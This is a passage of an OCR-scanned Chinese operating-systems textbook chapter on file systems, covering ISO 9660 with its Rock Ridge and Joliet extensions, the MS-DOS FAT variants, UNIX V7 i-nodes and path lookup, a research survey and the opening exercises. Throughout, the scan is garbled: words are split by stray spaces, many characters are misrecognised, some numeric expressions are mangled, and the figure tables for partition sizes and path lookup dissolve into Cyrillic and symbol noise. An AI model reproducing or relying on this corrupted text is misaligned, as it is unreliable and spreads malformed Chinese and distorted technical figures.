论 。 下 一 个 域 说 明了 在 ISO 9660 的 最 简 版 本 中 是 否 使 用 文件 分 隔 块 ， 我 们 也 不 做 讨论 。 

再 下 一 个 域 标明 了 该 文件 放 在 哪 一 个 CD-ROM 上 。 一 个 CD-ROM 的 目录 项 可 以 引用 在 同一 CD- 
ROM 集 中 的 另外 一 个 CD-ROM 上 的 文件 。 用 这 样 的 方法 就 可 以 在 第 一 张 CD-ROM 上 建立 一 个 主 目录 ， 
该 主 目录 列 出 了 在 这 个 CD-ROM 集 合 中 的 其 他 所 有 CD-ROM 上 的 文件 。 

图 4-30 中 标 有 L 的 域 给 出 了 文件 名 的 大 小 (以 字 节 为 单位 )。 之 后 的 域 就 是 文件 名 本 身 。 一 个 文件 名 
由 基本 名 、 一 个 点 、 扩 展 名 、 分 号 和 二 进 制 版 本 号 (1 或 2 个 字 节 ) 构成 。 基 本 名 和 扩展 名 可 以 使 用 大 写 
字母 、 数 字 0~9 和 下 划 线 。 禁 止 使 用 其 他 字符 以 保证 所 有 的 机 器 都 能 处 理 这 个 文件 名 。 基 本 名 最 多 可 以 
为 8 个 字符 ， 而 扩展 名 最 多 可 以 为 3 个 字符 。 这 样 做 是 为 了 保证 能 和 MS-DOS 兼 容 。 只 要 文件 的 版 本 号 不 
同 ， 则 相同 的 文件 名 可 以 在 同一 个 目录 中 出 现 多 次 。 

最 后 两 个 域 不 是 必需 的 。 填 充 域 用 来 保证 每 一 个 目录 项 都 是 偶数 个 字 节 ， 以 2 字 节 为 边界 对 齐 下 一 
项 的 数字 域 。 如 果 需 要 填充 的 话 ， 就 用 0 代替 。 最 后 一 个 域 是 系统 使 用 域 ， 该 域 的 功能 和 大 小 没有 定义 ， 
仅仅 只 要 求 该 域 为 偶数 个 字 节 。 不 同 的 系统 对 该 域 有 不 同 的 用 途 。 例 如 ，Macintosh 系 统 就 把 此 域 用 来 
保存 Finder 标 志 。 

一 个 目录 中 的 项 除了 前 两 项 之 外 ， 其 余 的 都 按 字 母 顺 序 排列 。 第 一 项 表示 当前 目录 本 身 ， 第 二 项 表 
示 当 前 目录 的 父 目 录 。 这 和 UNIX 的 .目录 和 .. 目 录 相似 。 而 文件 本 身 不 需要 按 其 目录 项 在 目录 中 的 顺序 
来 排列 。 

对 于 目录 中 目录 项 的 数目 没有 特定 的 限制 ， 但 是 对 于 目录 的 伐 套 深度 有 限制 ， 最 大 的 目录 供 套 深 度 
为 8。 为 了 使 得 有 关 的 实现 简化 一 些 ， 这 个 限制 是 任意 设置 的 。 

ISO 9660 定 义 了 三 个 级 别 。 级 别 1 的 限制 最 多 ， 限 制 文件 名 使 用 上 面 提 到 的 8 + 3 个 字符 的 表示 法 ， 
而 且 所 有 的 文件 必须 是 连续 的 (这 些 我 们 在 前 面 介绍 过 )。 进 而 ， 目 录 名 被 限制 在 8 个 字符 而 且 不 能 有 扩 
展 名 。 这 个 级 别 的 使 用 ， 使 得 CD-ROM 可 以 在 所 有 的 机 器 上 读 出 。 
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级 别 2 放宽 了 对 长 度 的 限制 。 它 允许 文件 和 目录 名 多 达 31 个 字符 ， 但 是 字符 集 还 是 一 样 的 。 

级 别 3 使 用 和 级 别 2 同 样 的 限制 ， 但 是 文件 不 需要 是 连续 的 。 在 这 个 级 别 上 ， 一 个 文件 可 以 由 几 个 自 
(extents) 构成 ， 每 一 个 段 可 以 由 若干 连续 分 块 构成 。 同 一 个 分 块 可 以 在 一 个 文件 中 出 现 多 次 ， 也 可 以 
出 现在 两 个 或 者 更 多 的 文件 中 。 如 果 相 当 大 的 一 部 分 数据 在 几 个 文件 中 重复 ， 级 别 3 则 通过 要 求 数据 不 
能 出 现 多 次 来 进行 空间 上 的 优化 。 

2. Rock Ridge 扩 展 

正如 我 们 上 面 所 看 到 的 ，ISO 9660 在 很 多 方面 有 限制 。 在 这 个 标准 公布 不 入，UNIX 工 作者 开始 在 
这 个 标准 上 进行 扩展 ， 使 得 在 CD-ROM 上 能 实现 UNIX 文 件 系统 。 这 个 扩展 被 命名 为 Rock Ridge， 这 个 
名 字 来 源 于 Gene Wilder 的 电影 {Blazing Saddles》 中 一 个 小 镇 ， 也 许 委 员 会 的 成 员 之 -喜欢 这 个 电影 ， 
便 以 此 命名 。 

该 扩展 使 用 了 系统 使 用 域 ， 使 得 Rock Ridge CD-ROM 可 以 在 所 有 计算 机 上 可 读 。 其 他 所 有 的 域 仍 
然 保持 ISO 9660 标 准 中 的 定义 。 所 有 其 他 不 识别 Rock Ridge 扩 展 的 系统 只 需要 忽略 这 个 域 ， 把 盘 当 作 普 
通 的 CD-ROM 来 识别 即 可 。 

该 扩展 分 为 下 面 几 个 域 ; 

1) PX 一 一 POSIX 属 性 。 

2) PN 一 一 主 设备 号 和 次 设备 号 。 


3) SL 一 一 符号 链接 。 
4) NM 一 一 替代 名 。 
5) CL 一 一 子 位 置 。 
6) PL 一 一 父 位 置 。 
7) RE 一 一 重 定位 。 
8) TF 一 一 时 间 蕉 。 


PX 域 包 含 了 标准 UNIX 的 rwxrwxrwx 所 有 者 、 同 组 用 户 和 其 他 用 户 权 限 位 。 也 包含 了 包含 在 模式 字 
中 的 其 他 位 ， 如 SETUID 位 和 SETGID 位 等 。 

为 了 能 在 CD-ROM 上 表示 原始 设备 ， 需要 PN 域 来 表示 。 该 域 包含 了 和 文件 相关 的 主 设备 号 和 次 设 

号 。 这 样 ， dev 目录 的 内 容 就 可 以 在 写 到 CD-ROM 上 之 后 在 目标 系统 上 重新 正确 地 构造 。 

SL 域 是 符号 链接 ， 它 允 许 在 一 个 文件 系统 上 的 文件 可 以 引用 另 一 个 文件 系统 上 的 文件 。 

最 重要 的 域 是 NM 域 。 它 允 许 同一 个 文件 可 以 关联 第 二 个 名 字 。 这 个 名 字 不 受 ISO 9660 字 符 集 和 长 
度 的 限制 ， 这 样 使 得 在 CD-ROM 上 可 以 表示 任意 的 UNIX 文 件 。 

接 下 来 的 三 个 域 一 起 用 来 消除 ISO 9660 中 的 对 目录 和 岂 套 深 度 为 8 的 限制 。 使 用 这 几 个 域 可 以 指明 一 
个 目录 被 重 定位 了 ， 而 且 可 以 标明 其 层次 结构 。 这 对 于 消除 深度 限制 非常 有 用 。 

最 后 ，TF 域 包含 了 每 个 UNIX 的 i 节 点 中 的 三 个 时 间或 。 文件 创建 时 间 、 文 件 修改 时 间 和 文件 最 后 访 
问 的 时 间 。 有 了 这 些 扩展 ， 就 可 以 将 一 个 UNIX 文 件 系统 复制 到 CD-ROM 上 ， 并 且 能 够 在 不 同 的 系统 上 
正确 恢复 。 

3.Joliet 扩 展 

UNIX 委 员 会 不 是 惟一 对 ISO 9660 进 行 扩 展 的 小 组 ， 微软 也 发 现 了 这 个 标准 有 太 多 的 限制 (尽管 这 
些 限制 最 初 都 是 由 于 微软 自己 的 MS-DOS 引 起 的 )。 所 以 微软 也 做 了 一 些 扩展 ， 名 为 Joliet。 这 个 扩展 设 
计 的 目的 是 ， 为 了 能 够 将 Windows 文 件 系统 复制 到 CD-ROM 上 ， 并 且 能 够 恢复 (与 为 UNIX 设 计 Rock 
Ridge 的 思路 一 样 )。 实 际 上 所 有 能 在 Windows 上 运行 的 、 使 用 CD-ROM 的 程序 都 支持 Joliet， 包 括 可 写 
CD 的 刻录 程序 。 通常 这 些 程序 都 让 用 户 选择 是 使 用 ISO 9660 标 准 还 是 Joliet 标 准 。 

Jotiet 提 供 的 主要 扩展 为 ; 

D 长 文件 名 。 

2) Unicode 字 符 集 。 

3) 比 8 层 更 深 的 目录 伐 套 深度 。 

4) 带 扩展 名 的 目录 。 
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第 一 个 扩展 允许 文件 名 多 达 64 字 符 。 第 二 个 扩展 允许 文件 名 使 用 Unicode 字 符 集 ， 这 个 扩展 对 那些 
不 使 用 拉丁 字符 集 的 国家 非常 重要 ， 如 日 本 、 以 色 列 和 希腊 。 因 为 Unicode 字 符 是 2 个 字 节 的 ， 所 以 Joliet 
最 长 的 文件 名 可 以 达到 128 字 节 。 

和 Rock Ridge 一 样 ，Joliet 同 样 消除 了 对 目录 供 套 深度 的 限制 。 目 录 可 以 根据 需要 达到 一 定 的 俯 套 
深度 。 最 后 ， 目 录 名 也 可 以 有 扩展 名 。 目 前 还 不 清楚 为 什么 有 这 个 扩展 ， 因 为 大 多 数 的 Windows 目 录 从 
来 没有 扩展 名 ,但 或 许 有 一 天 会 用 到 。 


4.5.2 ”MS-DOS 文件 系统 

MS-DOS 文 件 系统 是 第 一 个 IBM PC 系列 所 采用 的 文件 系统 。 它 也 是 Windows 98 与 Windows ME 所 采 
用 的 主要 的 文件 系统 。Windows 2000, Windows XP 与 Windows Vista 上 也 支持 它 ， 虽 然 除了 软盘 以 外 ， 
它 现在 已 经 不 再 是 新 的 PC 的 标准 了 。 但是， 它 和 它 的 扩展 (FAT-32) 一 直 被 许多 幅 入 式 系统 所 广泛 使 用 。 
大 部 分 的 数码 相机 使 用 它 。 许 多 MP3 播 放 器 只 能 使 用 它 。 流 行 的 芋 果 公司 的 iPod 使 用 它 作为 默认 的 文件 
系统 ， 尽 管 知识 渊博 的 骇 客 可 以 重新 格式 化 iPod 并 安装 一 个 不 同 的 文件 系统 。 使 用 MS-DOS 文 件 系统 的 
电子 设备 的 数量 现在 要 远 远 多 于 过 去 ， 并 且 当 然 远 远 多 于 使 用 更 现代 的 NTFS 文 件 系统 的 数量 。 因 此 ， 
我 们 有 必要 看 一 看 其 中 的 一 些 细节 。 

要 读 文 件 时 ，MS-DOS 程 序 首先 要 调用 open 系 统 调用 ， 以 获得 文件 的 句柄 。open 系 统 调用 识别 一 
个 路 径 ， 可 以 是 绝对 路 径 或 者 是 相对 于 现在 工作 目录 的 路 径 。 路 径 是 一 个 分 量 一 个 分 量 地 查找 的 ， 直到 
查 到 最 终 的 目录 并 读 进 内 存 。 然 后 开始 搜索 要 打开 的 文件 。 

尽管 MS-DOS 的 目录 是 可 变 大 小 的 ， 但 它 使 用 固定 的 32 字 节 的 目录 项 ，MS-DOS 的 目录 项 的 格式 如 
图 4-31 所 示 。 它 包含 文件 名 、 属 性 、 建 立 日 期 和 时 间 、 起 始 块 和 具体 的 文件 大 小 。 在 每 个 分 开 的 域 中 ， 
少 于 8+ 3 个 字符 的 文件 名 左 对 齐 ， 在 右边 补 空格 。 属 性 域 是 一 个 新 的 域 ， 包含 用 来 指示 一 个 文件 是 只 读 
的 存档 的 、 隐 藏 的 还 是 一 个 系统 文件 的 位 。 不 能 写 只 读 文件 ， 这 样 避免 了 文件 意外 受 损 。 存 档 位 没有 
对 应 的 操作 系统 的 功能 ( 即 MS-DOS 不 检查 和 设置 它 ) 。 存档 位 主要 的 用 途 是 使 用 户 级 别 的 存档 程序 在 
存档 一 个 文件 后 清理 这 一 位 ， 其 他 程序 在 修改 了 这 个 文件 之 后 设置 这 一 位 。 以 这 种 方式 ， 一 个 备份 程序 
可 以 检查 每 个 文件 的 这 一 位 来 确定 是 否 需要 备份 该 文件 。 设置 隐藏 位 能 够 使 一 个 文件 在 目录 列表 中 不 出 
现 ， 其 作用 是 避免 初级 用 户 被 一 些 不 熟悉 的 文件 搞 糊 涂 了 。 最 后 ， 系 统 位 也 隐藏 文件 。 另外 ， 系 统 文件 
不 可 以 用 del 命 令 删 除 ， 在 MS-DOS 的 主要 组 成 部 分 中 ， 系 统 位 都 被 设置 。 
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扩展 名 属性 保留 时 间 日 期 第 一 块 块 号 
图 4-31 MS-DOS 的 目录 项 


目录 项 也 包含 了 文件 建立 和 最 后 修改 的 日 期 和 时 间 。 时 间 只 是 精确 到 土 2s， 因为 它 只 是 用 2 个 字 节 
的 域 来 存储 ， 只 能 存储 65 536 个 不 同 的 值 (一 天 包含 86 400 秒 )。 这 个 时 间 域 被 分 为 秒 (5 个 位 ) 、 分 (6 
个 位 ) 和 小 时 (5 个 位 )。 以 日 为 单位 计算 的 日 期 使 用 三 个 子 域 :日 (5 个 位 )， 月 (4 个 位 )， 年 -1980 (7 
个 位 )。 用 7 个 位 的 数字 表示 年 ， 时 间 的 起 始 为 1980 年 ， 最 高 的 表示 年 份 是 2107 年 。 所 以 MS-DOS 有 内 在 
的 2108 年 问题 。 为 了 避免 灾难 ，MS-DOS 的 用 户 应 该 尽快 开始 在 2108 年 之 前 转变 工作 。 如 果 把 MS-DOS 
使 用 组 合 的 日 期 和 时 间 域 作为 32 位 的 秒 计数 器 ， 它 就 能 准确 到 秒 ， 可 把 灾难 推迟 到 2116 年 。 

MS-DOS 按 32 位 的 数字 存储 文件 的 大 小 ， 所 以 理论 上 文件 大 小 能 够 大 至 4GB。 尽 管 如 此 ， 其 他 的 约 
Ж (下 面 论述 ) 将 最 大 文件 限制 在 2GB 或 者 更 小 。 让 人 吃惊 的 是 目录 项 中 的 很 大 一 部 分 空间 (10 字 节 ) 
没有 使 用 。 

MS-DOS 通 过 内 存 里 的 文件 分 配 表 来 跟踪 文件 块 。 目 录 表 项 包含 了 第 一 个 文件 块 的 编号 ， 这 个 编号 用 
作 内 存 里 有 64K 个 目录 项 的 FAT 的 索引 。 沿 着 这 条 链 ， 所 有 的 块 都 能 找到 。FAT 的 操作 在 图 4-12 中 有 描述 。 

FAT 文 件 系 统 总 共有 三 个 版 本 ，FAT-12，FAT-16 和 FAT-32， 取 决 于 磁盘 地 址 包含 有 多 少 二 进 制 位 。 
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其 实 ，FAT-32 只 用 到 了 地 址 空间 中 的 低 28 位 ， 它 更 应 该 叫 FAT-28。 但 使 用 2 的 宕 的 这 种 表述 听 起 来 要 匀 
整 得 多 。 

在 所 有 的 FAT 中 ， 都 可 以 把 磁盘 块 大 小 调整 到 512 字 节 的 倍数 (不同 的 分 区 可 能 采用 不 同 的 倍数 )， 
合法 的 块 大 小 〈 微 软 称 之 为 搬 大 小 ) 在 不 同 的 FAT 中 也 会 有 所 不 同 。 第 一 版 的 MS-DOS 使 用 块 大 小 为 512 
字 节 的 FAT-12， 分 区 大 小 最 大 为 21* x 512 字 节 (实际 上 只 有 4086 x 512 字 节 ， 因 为 有 10 个 磁盘 地 址 被 用 
作 特殊 的 标记 ， 如 文件 的 结尾 、 坏 块 等 )。 根 据 这 些 参 数 ， 最 大 的 磁盘 分 区 大 小 约 为 2MB， 而 内 存 里 的 
FAT 表 中 有 4096 个 项 ， 每 项 2 字 节 (16 位 )。 若 使 用 12 位 的 目录 项 则 会 非常 慢 。 

这 个 系统 在 软盘 条 件 下 工作 得 很 好 ， 但 当 硬盘 出 现时 ， 它 就 出 现 问题 了 。 微 软 通过 允许 其 他 的 块 大 
小 如 (1KB，2KB,4KB) 来 解决 这 个 问题 。 这 个 修改 保留 了 FAT-12 表 的 结构 和 大 小 ， 但 是 允许 可 达 16 
MB 的 磁盘 分 区 。 

由 于 MS-DOS 支 持 在 每 个 磁盘 驱动 器 中 划分 四 个 磁盘 分 区 ， 所 以 新 的 FAT-12 文 件 系统 可 在 最 大 
64MB 的 磁盘 上 工作 。 除 此 之 外 ， 还 必须 引入 新 的 内 容 。 于 是 就 引进 了 FAT-16， 它 有 16 位 的 磁盘 指针 ， 
而 且 人 允许 8KB、16KB 和 32KB 的 块 大 小 (32 768 是 用 16 位 可 以 表示 的 2 的 最 大 等 ) 。 FAT-16 表 需要 占据 内 
存 128KB 的 空间 。 由 于 当时 已 经 有 更 大 的 内 存 ， 所 以 它 很 快 就 得 到 了 应 用 ， 并 且 取 代 了 FAT-12 系 统 。 
FAT-16 能 够 支持 的 最 大 磁盘 分 区 是 2GB (64K 个 项 ， 每 个 项 32KB) ， 支 持 最 大 8GB 的 磁盘 ， 即 4 个 分 区 ， 
每 个 分 区 2GB 。 

对 于 商业 信和 浮 来 说 ， 这 个 限制 不 是 问题 但 对 于 存储 采用 DV 标准 的 数字 视频 来 说 ， 一 个 2GB 的 文 
件 仅 能 保存 9 分 钟 多 一 点 的 视频 。 结 果 就 是 无 论 磁盘 有 多 大 ，PC 的 磁盘 也 只 能 支持 四 个 分 区 ， 能 存储 在 
磁盘 中 的 最 长 的 视频 大 约 是 38 分 钟 。 这 一 限制 也 意味 着 ， 能 够 在 线 编辑 的 最 大 的 视频 少 于 19 分 钟 ， 因为 
同时 需要 输入 和 输出 文件 。 


随 着 Windows 95 第 2 版 的 发 行 ， 引 入 了 FAT-32 文 件 [ 块 大 小 ҒАТ-12 FAT-16 | FAT-32 
系统 ， 它 具有 28 位 磁盘 地 址 。 在 Windwos 95 下 的 MS- | 05KB | 2MB 
DOS 也 被 改造 ， 以 适应 FAT-32。 在 这 个 系统 中 ， 分 区 1KB | 4MB 
理论 上 能 达到 2*”x 2's 字 和 节 ， 但 实际 上 是 限制 在 2TB 2KB 8MB | 128 МВ ]| 
(20480В), ， 因 为 系统 在 内 部 的 512 字 节 长 的 扁 区 中 使 4KB | 16MB | 256MB | 1TB 
用 了 一 个 32 位 的 数字 来 记录 分 区 的 大 小 ,这样 2x232 | 8KB 512MB | 2TB 
是 2TB。 对 应 不 同 的 块 大 小 以 及 所 有 三 种 FAT 类 型 的 最 16кв _ | 1024MB | 2TB 
大 分 区 都 在 图 4-32 中 表示 出 来 。 32 KB 2048 MB | 2TB 


除了 支持 更 大 的 磁盘 之 外 ，FAT-32 文 件 系统 相 比 азо 对 应 不 同 的 块 大 小 的 最 大 分 区 
FAT-16 文 件 系统 有 另外 两 个 优点 。 首 先 ， 一 个 用 FAT- наке 
32 的 8GB 磁 盘 可 以 是 一 个 分 区 ， 而 使 用 FAT-16 则 必须 是 азн 
四 个 分 区 ， 对 于 Windows 用 户 来 说 ， 就 是 “C:"、*Di"、*E:” Яп “Б,” А58, MATLA 
己 决定 哪个 文件 放 在 哪个 盘 以 及 记录 的 内 容 放 在 什么 地 方 。 

FAT-32 相 对 于 FAT-16 的 另外 一 个 优点 是 ， 对 于 一 个 给 定 大 小 的 硬盘 分 区 ， 可 以 使 用 一 个 小 一 点 的 块 
大 小 。 例 如 ， 对 于 一 个 2GB 的 硬盘 分 区 ，FAT-16 必 须 使 用 32KB 的 块 ， 否则 仅 有 的 64K 个 磁盘 地 址 就 不 能 
覆盖 整个 分 区 。 相 反 ，FAT-32 处 理 一 个 2GB 的 硬盘 分 区 的 时 候 就 能 够 使 用 4KB 的 块 。 使 用 小 块 的 好 处 是 
大 部 分 文件 都 小 于 32KB。 如 果 块 大 小 是 32KB， 那 么 一 个 10 字 节 的 文件 就 占用 32KB 的 空间 ， 如 果 文件 
平均 大 小 是 8KB， 使 用 32KB 的 块 大 小 ，3/4 的 磁盘 空间 会 被 浪费 ， 这 不 是 使 用 磁盘 的 有 效 方法 。 而 8KB 
的 文件 用 4KB 的 块 没有 空间 的 损失 ， 却 会 有 更 多 的 RAM 被 FAT 系 统 占用 。 把 4KB 的 块 应 用 到 一 个 2GB 的 
磁 稚 分 区 ， 会 有 512K 个 块 ， 所 以 FAT 系 统 必须 在 内 存 里 包含 512K 个 项 (占用 了 2MB 的 RAM)。 

MS-DOS 使 用 FAT 来 跟踪 空 闪 磁盘 块 。 当 前 没有 分 配 的 任何 块 都 会 标 上 一 个 特殊 的 代码 ， 当 MS- 
DOS 需 要 一 个 新 的 磁盘 块 时 ， 它 会 搜索 FATE/ 找 到 一 个 包含 这 个 代码 的 项 。 所 以 不 需要 位 图 或 者 空闲 表 。 
453 UNIX V7 文件 系统 

即使 是 早期 版 本 的 UNIX 也 有 一 个 相当 复杂 的 多 用 户 文件 系统 ， 因 为 它 是 从 MULTICS 继 承 下 来 的 。 
下 面 我 们 将 会 讨论 V7 文 件 系统 ， 这 是 为 PDP-11 创 建 的 一 个 文件 系统 ， 它 也 使 得 UNIX 闻 名 于 世 。 我 们 将 
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在 第 10 章 通过 Linux 讨 论 现代 UNIX 的 文件 系统 。 
文件 系统 从 根 目录 开始 形成 树 状 ， 加 上 链接 ， 形 成 了 一 个 有 向 无 环 图 。 文 件 名 可 以 多 达 14 个 字符 ， 
能 够 容纳 除了 /和 NUL 之 外 的 任何 ASCII 字 符 ，NUL 也 表示 成 数 


字数 值 0 + 2 14 
UNIX 目 录 中 为 每 个 文件 保留 了 一 项 。 每 项 都 很 简单 ， 因 [| 文件 名 

“为 UNIX 使 用 i 节点 ， 如 图 4-13 中 所 示 。 一 个 目录 项 包含 了 两 个 

域 ， 文 件 名 (14 个 字 节 ) 和 i 节点 的 编号 (2 个 字 节 ) ， 如 图 4-33 itg 


所 示 。 这 些 参数 决定 了 每 个 文件 系统 的 文件 数目 为 64K 。 
就 像 图 4-13 中 的 i 节 点 一 样 ，UNIX 的 i 节 点 包含 一 些 属性 。 图 4-33 UNIX V7 的 目录 表 项 
这 些 属性 包括 文件 大 小 、 三 个 时 间 (创建 时 间 ， 最 后 访问 时 间 ， 
最 后 修改 时 间 ) 、 所 有 者 、 所 在 组 、 保 护 信息 以 及 一 个 计数 (用 于 记录 指向 节点 的 目录 项 的 数量 )。 最 后 
一 个 域 是 为 了 链接 而 设 的 。 当 一 个 新 的 链接 加 到 一 个 节点 上 ， i 节点 里 的 计数 就 会 加 1。 当 移 走 一 个 连接 
时 ， 该 计数 就 减 1。 当 计数 为 0 时 ， 就 收回 该 i 节 点 ， 并 将 对 应 的 磁盘 块 放 进 空闲 表 。 
对 于 特别 大 的 文件 ， 可 以 通过 图 4-13 所 示 的 方法 来 跟踪 磁盘 块 。 前 10 个 磁盘 地 址 是 存储 在 i 节点 自 
身 中 的 ， 所 以 对 于 小 文件 来 说 ， 所 有 必需 的 信息 恰好 是 在 i 节点 中 。 而 当 文件 被 打开 时 ，i 节 点 将 被 从 磁 
盘 取 到 内 存 中 。 对 于 大 一 些 的 文件 ，i 节 点 内 的 其 中 一 个 地 址 是 称 为 一 次 间接 块 (single indirect block) 
的 磁盘 块 地 址 。 这 个 块 包含 了 附加 的 磁盘 地 址 。 如 果 还 不 够 的 话 ， 在 i 节点 中 还 有 另 一 个 地 址 ， 称 为 二 
次 间接 块 (double indirect block)。 它 包含 一 个 块 的 地 址 ， 在 这 个 块 中 包含 若干 个 一 次 间接 块 。 每 一 个 
这 样 的 一 次 间接 块 指向 数 百 个 数据 块 。 如 果 这 样 还 不 够 的 话 ， 可 以 使 用 三 次 间接 块 (triple indirect block ) 。 
整个 情况 参见 图 4-34。 
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图 4-34 一 个 UNIX 的 节点 


当 打开 某 个 文件 时 ， 文 件 系统 必须 要 获得 文件 名 并 且 定位 它 所 在 的 磁盘 块 。 让 我 们 来 看 一 下 怎样 查 
找 路 径 名 /usr/ast/mbox。 以 UNIX 为 例 ， 但 对 所 有 的 层次 目录 系统 来 说 ， 这 个 算法 是 大 致 相同 的 。 首 先 ， 
文件 系统 定位 根 目录 。 在 UNIX 系 统 中 ， 根 目录 的 i 节 点 存放 于 磁盘 上 固定 的 位 置 。 从 这 个 ji 节点， 系统 将 
可 以 定位 根 目录 ， 虽 然 根 目录 可 以 放 在 磁盘 上 的 任何 位 置 ， 但 假定 它 放 在 磁盘 块 1 的 位 置 。 

接 下 来 ， 系 统 读 根 目录 并 且 在 根 目录 中 查找 路 径 的 第 一 个 分 量 usr， 以 获取 /usr 目 录 的 ;节点 号 。 由 i 
节点 号 来 定位 i 节 点 是 很 直接 的 ， 因为 每 个 i 节 点 在 磁盘 上 都 有 固定 的 位 置 。 根 据 这 个 i 节 点， 系统 定位 
/usr 目 录 并 在 其 中 查找 下 一 个 分 量 ast。 一 旦 找到 ast 的 项 ， 便 找到 了 /usrast 目 录 的 i 节 点 。 依 据 这 个 i 节 点 ， 
可 以 定位 该 目录 并 在 其 中 查找 mbox。 然 后 ， 这 个 文件 的 i 节 点 被 读 和 内存， 并 且 在 文件 关闭 之 前 会 一 直 
保留 在 内 存 中 。 图 4-35 显 示 了 查找 的 过 程 。 
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块 132 是 /usrlast 的 块 406 是 


根 目录 /usr 的 i 节点 6 /usr 目 录 1426 изг/аз Н Ж 
1 | я Та в 
| size 1 эше 
a | bn шам [Г аек тее: 
ан E aja | [ж 
14 Ба i 51 | im | 
9 | etc 26 | ast 
6 | usr 45 | bai 17 | src 
DEE me itzi 
Е i 节点 6 说 明 。。 jusriast 是 РАА 
Аа өни отд» АЧАА бщк 


图 4-35 查找 /usrlasymbox 的 过 程 


相对 路 径 名 的 查找 同 绝对 路 径 的 查找 方法 相同 ， 只 不 过 是 从 当前 工作 目录 开始 查找 而 不 是 从 根 目录 
开始 。 每 个 目录 都 有 .和 .. 项 ， 它 们 是 在 目录 创建 的 时 候 同 时 创建 的 。. 表 项 是 当前 目录 的 i 节点 号 ,而 .. 表 
项 是 父 目 录 (上 一 屋 目录 ) 的 i 节点 号 。 这 样 ， 查 找 ../dick/prog.c 的 过 程 就 成 为 在 工作 目录 中 查找 ..， 寻 
找 父 目录 的 i 节点 号 ， 并 查询 dick 目 录 。 不 需要 专门 的 机 制 处 理 这 些 名 字 。 目 录 系统 只 要 把 这 些 名 字 看 作 
普通 的 ASCII 字 符 串 即 可 ， 如 同 其 他 的 名 字 一 样 。 这 里 惟一 的 巧妙 之 处 是 .. 在 根 目录 中 指向 自身 。 


46 有 关 文 件 系统 的 研究 

文件 系统 总 是 比 操作 系统 的 其 他 部 分 吸引 了 更 多 的 研究 ， 现 在 也 是 这 样 。 当 标准 的 文件 系统 被 完全 
理解 后 ， 现 在 还 有 很 多 后 续 的 关于 优化 高 速 缓存 管理 的 研究 (Burmett 等 人 ，2002，Ding 等 人 ，2007， 
Gnaidy 等 人 ，2004，Kroeger 和 Long，2001，Pai 等 人 ，2000， 以 及 Zhou 等 人 ，2001)。 后 续 的 工作 还 有 
关于 新 类 型 的 文件 系统 ， 例 如 用 户 级 别 的 文件 系统 (Mazieres，2001)， 闪 存 文件 系统 (Gal 等 人 ，2005)， 
日 志文 件 系统 (Prabhakaran 等 人 ，2005， 以 及 Stein 等 人 ，2001) ， 版 本 控制 (versioning) 文件 系统 
(Cornell 等 人 ，2004) ， 对 等 (peer-to-peer) 文件 系统 (Muthitacharoen 等 人 ，2002) ， 以 及 其 他 。 
Google 文 件 系统 也 不 寻常 ， 因 为 它 有 极 好 的 容错 性 能 (Ghemawat 等 人 ，2003)。 文 件 系统 内 不 同 的 查询 
方法 也 是 很 有 意义 (Padioleau 和 Ridoux，2003) 。 

另 一 个 受到 关注 的 领域 是 起 源 (provenance) 一 一 追踪 数据 的 历史 ， 包 括 它们 来 自 哪里 ， 谁 拥有 它 
们 ， 以 及 它们 是 如 何 转换 的 (Muniswarmy-Reddy 等 人 、2006， 以 及 Shah 等 人 ，2007)。 这 个 信息 可 以 以 
不 同 的 方式 加 以 运用 。 备 份 也 一 直 受 到 关注 (Cox 等 人，2002， 以 及 Rycroft 等 人 ，2006)， 如 同 恢复 的 
相关 主题 一 样 Keeton 等 人 ，2006)。 与 备份 有 关 的 还 有 ， 设 法 保持 数据 几 十 年 ， 并 仍旧 可 以 使 用 
(Baker 等 人 ，2006，Maniatis 等 人 ，2003)。 可 靠 性 与 安全 性 也 是 需要 解决 的 问题 (Greenan 和 Miller， 
2006，Wires 和 Feeley，2007，Wright 等 人 ，2007;， 以 及 Yang 等 人 ，2006)。 最 后 ， 性 能 始终 是 一 个 值得 
研究 的 主题 (Caudill 和 Gavrikovska，2006，Chiang 和 Huang，2007，Stein，2006，Wang 等 人 ，2006a; 
以 及 Zhang 和 Ghose，2007) 。 


4.7 小 结 

从 外 部 看 ， 文 件 系统 是 一 组 文件 和 目录 ， 以 及 对 文件 和 目录 的 操作 。 文 件 可 以 被 读 写 ， 目 录 可 以 被 
创建 和 删除 ， 并 可 将 文件 从 一 个 目录 移 到 另 一 个 目录 中 。 大 多 数 现代 操作 系统 都 支持 层次 目录 系统 ， 其 
中 ， 目 录 中 还 有 子 目录 ， 子 目录 中 还 可 以 有 子 目录 ， 如 此 无 限 下 去 。 

而 在 内 部 看 ， 文 件 系统 又 是 另 一 番 景 象 。 文 件 系统 的 设计 者 必须 考虑 存储 区 是 如 何 分 配 的 ， 系统 如 
何 记录 哪 个 块 分 给 了 哪个 文件 。 可 能 的 方案 有 连续 文件 、 链 表 、 文 件 分 配 表 和 i 节 点 等 。 不 同 的 系统 有 
不 同 的 目录 结构 。 属 性 可 以 存在 目录 中 或 存在 别处 (比如 ， 在 i 节 点 中 ) 。 磁盘 空间 可 以 通过 位 图 的 空闲 
表 来 管理 。 通 过 增 量 转 储 以 及 用 程序 修复 故障 文件 系统 的 方法 ， 可 以 提高 文件 系统 的 可 靠 性 。 文 件 系统 
的 性 能 非常 重要 ， 可 以 通过 多 种 途径 提高 性 能 ， 包 括 高 速 缓存 、 预 读 取 以 及 尽 可 能 仔细 地 将 一 个 文件 中 
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的 块 紧密 地 放置 在 一 起 等 方法 。 日 志 结 构 文 件 系统 通过 大 块 单元 写 入 的 操作 也 可 以 改善 性 能 。 
文件 系统 的 例子 有 ISO 9660、MS-DOS 以 及 UNIX。 它 们 之 间 在 怎样 记录 每 个 文件 所 使 用 的 块 、 目 


录 结 构 以 及 对 空闲 磁盘 空间 管理 等 方面 都 存在 着 差别 。 


习题 


1. 在 早期 的 UNIX 系 统 中 ， 可 执行 文件 (aout) 
以 一 个 非常 特别 的 魔 数 开始 ， 这 个 数 不 是 随机 
选择 的 。 这 些 文件 都 有 文件 头 ， 后 面 是 正文 自 
和 数据 段 。 为 什么 要 为 可 执行 文件 挑选 一 个 非 
常 特别 的 魔 数 ， 而 其 他 类 型 文件 的 第 一 个 字 反 
而 有 一 个 或 多 或 少 是 随机 选择 的 魔 数 ? 

2. 在 图 4-4 中 ， 一 个 属性 是 记录 长 度 。 为 什么 操作 
系统 要 关心 这 个 属性 ? 

3. 在 UNIX 中 open 系 统 调用 绝对 需要 吗 ? 如 果 没 
有 会 产生 什么 结果 ? 

4. 在 支持 顺序 文件 的 系统 中 总 有 一 个 文件 回 绕 操作 ， 
